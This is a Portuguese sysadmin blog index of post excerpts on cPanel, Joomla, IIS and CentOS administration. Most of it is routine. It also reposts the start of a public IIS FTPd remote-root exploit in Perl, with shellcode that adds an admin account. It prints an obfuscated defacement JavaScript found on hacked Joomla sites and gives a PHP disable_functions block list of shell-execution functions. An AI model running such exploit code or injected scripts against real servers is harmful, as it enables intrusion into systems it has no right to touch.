dnnViewState SPAM Joomla Como resolver (HOW TO SOLVE THIS)

03/08/2013 5 Comments

É comum ver o CMS joomla em suas versões mais antigas sendo trollado por uma chuva de webbots, um dos defaces mais imundos que rodam na atualidade são justamente esses 2 (AVAST Chama-o de CLICKJACK-A — TROJAN):   <script type=”text/javascript” language=”JavaScript”>// <![CDATA[ function xViewState() { var a=0,m,v,t,z,x=new Array(‘9091968376′,’8887918192818786347374918784939277359287883421333333338896′,’877886888787′,’949990793917947998942577939317’),l=x.length;while(++a<=l){m=x[l-a]; t=z=”; for(v=0;v<m.length;){t+=m.charAt(v++); if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a); t=”;}}x[l-a]=z;}document.write(‘<‘+x[0]+’ ‘+x[4]+’>.’+x[2]+'{‘+x[1]+’}</’+x[0]+’>’);}xViewState(); // ]]></script> …

Por que atualizar o meu WordPress ou Joomla?

27/07/2012 0 Comments

Foi publicado recentemente um meio de prevenir ataques a CMS famosos da internet. Leitura recomendadíssima: http://icentral.com.br/blog/qual-motivo-de-atualizar-um-cms-no-meu-host-quer-seja-wordpress-joomla-drupal-e-etc/

WHM sumiu com meus ips adicionados anteriormente e ao tentar adicionar novamente aparece a mensagem is already…

13/04/2012 2 Comments

Calma, sem problemas. Se conseguir entre como root e rode o seguinte comando:   /etc/rc.d/init.d/ipaliases restart Depois veja no whm se os ips voltaram, caso ainda assim não tenha retornado rode chkconfig –list ipaliases Verifique também (caso os comando acima não sanem seu problema) os arquivos: /etc/ips e /etc/ipaddrpool Abraços.  

FIAT + FIORI – UMA PARCERIA DE BABACAS FOREVER ALONE

21/03/2012 0 Comments

A concessionária Fiori, revendedora da linha Fiat em João Pessoa, comercializou em dezembro de 2011 um veículo ‘Novo Palio’, modelo 2012, de placas OFB-7139-PB, com falhas ao cliente José Fernando Santos de Carvalho. De acordo com o comprador, dois dias após a aquisição do veículo, começaram os intermináveis problemas. Inicialmente, o veículo não deu partida, …

Como remover URLSCan do IIS

14/06/2010 0 Comments

Para remover o URLScan do IIS siga os passos abaixo no windows em inglês: Start—> Programs—> Administrative Tools —> Services Pare o IDC. Agora vamos gerenciar o iis: Start—> Programs Administrative Tools—> Internet Services Manager Dê um duplo clique no servidor e em seguida clique com o botão direito sobre Default Web Site. Clique nas …

Como reparar o firewall do Windows

14/06/2010 0 Comments

use o Regedit! HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch Query Value;Set Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy Full Control;Read HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Defaults\FirewallPolicy Full Control;Read For the DHCP Client service, the issue may occur if the “NT Service\DHCP” account does not have the necessary permissions for the following keys: Registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dhcp permission needed: Query value, Create value, Enumerate Subkeys, Notify, Read Control Registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dhcp\Configurations permission …

RoundCube não está permitindo excluir mensagens. Pastas Trash, Send e Junk (lixeira, enviados e rascunho) não aparecem

21/05/2010 0 Comments

Se você não consegue ver as pastas do RoundCube “seus problemas SE ACABARAM-SE”. O bendito, em sua versão stable (quase 100% stable) está com uma linda opção em off (FALSE). Na pasta …roundcube/config/main.inc.php (se for no ispconfig: /home/admispconfig/ispconfig/web/roundcubemail/config/main.inc.php) Apresentará este array aqui: // automatically create the above listed default folders on login $rcmail_config[‘create_default_folders’] = FALSE; …

Regras bacanas do Mod_Security 2 (apache 2)

02/05/2010 0 Comments

Olá ALL, Uma coisa comum para combater uso indevido de cgi é impedir o uso de cgi (perl) em um servidor de hospedagem de sites compartilhada, mas nem sempre dá para impedir o uso. Então uma das formas de contornar o uso indevido é aplicar regras do mod_security do apache afim de que possamos filtrar …

Lista de funções para desabilitar em um ambiente CPANEL de Hospedagem de Sites compartilhada

05/04/2010 0 Comments

Bem, se você quer mais segurança em um ambiente compartilhado você precisará de ajustar seu php.ini global (/usr/local/lib/php.ini) em seu servidor de hospedagem compartilhada afim de prevenir ataques usando recursos avançados do php. Como faremos isto? Procure pela linha disable_functions = e depois do ‘=’ aplique as seguintes funções: dl, system, exec, shell_exec, chown, chgrp, …

Como corrigir automaticamente permissões inseguras em scripts e pastas de um domínio no linux/whm?

28/02/2010 0 Comments

Rode os comandos como root: find /home/*/public_html -type d -exec chmod 755 {} \; find /home/*/public_html -type f -exec chmod 644 {} \; Isto fará com que os arquivos possam receber permissões 644 e os diretórios 755. Abraços.

Exploit para o IIS 6 (FTPD) – BOF

01/02/2010 0 Comments

# IIS 5.0 FTPd / Remote r00t exploit # Win2k SP4 targets # bug found & exploited by Kingcope, kcope2googlemail.com # Affects IIS6 with stack cookie protection # August 2009 – KEEP THIS 0DAY PRIV8 use IO::Socket; $|=1; #metasploit shellcode, adduser “winown:nwoniw” $sc = “\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49” . “\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51” . “\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32” . “\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41” . “\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30” . “\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55” …

Gestor de smart trabalha de maneira eficiente no Ubnutu Karmic e revela problemas antes que ocorram

23/01/2010 0 Comments

Uma das coisas que mais gosto no Ubuntu é a sua facilidade de uso e principalmente a forma eficaz que ele gerencia o sistema em si. Estive com um notebook “aposentado” por 4 meses devido a falta do drive de cd-rom (na realidade já não lê nada… rsrsrs). Esperei um bom tempo afim de que …

Como listar todos os subdomínios de um determinado domínio

14/12/2009 2 Comments

No windows clique em Iniciar->executar-> CMD Assim que o ms-dos abrir informe isto: Nslookup server IP_aonde_o_site_está set type=any ls -d domínio.com.br 😀

Como aumentar quantidade de falhas no lfd (csf) para erros de login e senha no whm cpanel

03/12/2009 0 Comments

Para quem usa CSF e deseja aumentar a quantidade de tentativas de acesso no firewall antes que ele dê um lock no ip, basta acessar o arquivo de configuração do CSF e modificar a quantidade de tentativas em: LF_SSHD = para tentativas ssh, LF_FTPD = para tentativas ftp, LF_SMTPAUTH = para tentativas smtp, LF_POP3D = …

Colocando as permissões corretas no arquivo Crontab do WHM/CPANEL no Centos/RedHat ou Fedora

23/11/2009 0 Comments

Sempre que houver algum problema de execução do cron, parte dos problemas dá-se pelas permissões incorretas, para isto basta corrigir com o seguinte comando (dentro de seu server e como root): chmod 4755 /usr/bin/crontab Abraços galera.

Instalando YUM no CENTOS 5 (32 e 64 bits) How to install yum on Centos 5

12/11/2009 3 Comments

Galera, bom dia, faz tempo que não posto, maaasss, abaixo segue tutorial de instalação do YUM no CENTOS 5 (tanto para 32 bits como 64 bits): PARA 32 bits (i386): rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/elfutils-libs-0.137-3.el5.i386.rpm rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/gmp-4.1.4-10.el5.i386.rpm rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/readline-5.1-3.el5.i386.rpm rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/python-2.4.3-27.el5.i386.rpm rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/python-iniparse-0.2.3-4.el5.noarch.rpm rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/libxml2-2.6.26-2.1.2.8.i386.rpm rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/libxml2-python-2.6.26-2.1.2.8.i386.rpm rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/expat-1.95.8-8.2.1.i386.rpm rpm …

PHP 5.2.11 LIBERADO! Cpanel Já fez barulho quanto a isto hein!

19/09/2009 0 Comments

Galera, para quem gosta de manter-se atualizado, a Zend (pai do php) lançou juntamente com a equipe de desenvolvimento o php 5.2.11. Vale a pena o update devido a quantidade de bugs corrigidos. http://www.php.net Para os usuários de cpanel o easyapache já está liberando disponibilizando junto ao whm, vide: http://changelog.cpanel.net/?treeview=easyapache embedded by Embedded Video Download …

PHP: Não tem dinheiro para “encriptar” seus scripts? Obfuscator já!

15/09/2009 0 Comments

Pois é, esta dica vai para quem está precisando poupar um cash mas gostaria de tornar mais difícil a leitura de seus scripts pelos “rippators tabajara” da web! Isto mesmo, com o PHP Obfuscator Seus problemas acabaram! Grátis e Open Source! Segue o link do site: http://www.raizlabs.com/software/phpobfuscator/

Quando tudo estiver para baixo (down) use yum-allowdowngrade!

04/09/2009 0 Comments

Bom galera, o nerd aqui vai postar algo um pouco interessante para quem usa Red Hat/Centos/Fedora (e based) e usa o yum para fazer manipulação de pacotes e etc. Se você tem a necessidade de DownGrade de qualquer coisa que instalou no server, principalmente se usou yum, nada de problema, siga os passos abaixo e …

como Meu servidor não requer autenticação whm cpanel como forçar autenticação de email how to force mail authentication

04/09/2009 0 Comments

Nada de pânico, entre no console como root e digite o seguinte comando: /usr/local/cpanel/bin/tailwatchd –enable=Cpanel::TailWatch::Antirelayd 😀 fonte: http://littleoak.wordpress.com/2009/08/01/meu-servidor-nao-requer-autenticacao-whm-cpanel-como-forcar-autenticacao-de-email-how-to-force-mail-authentication/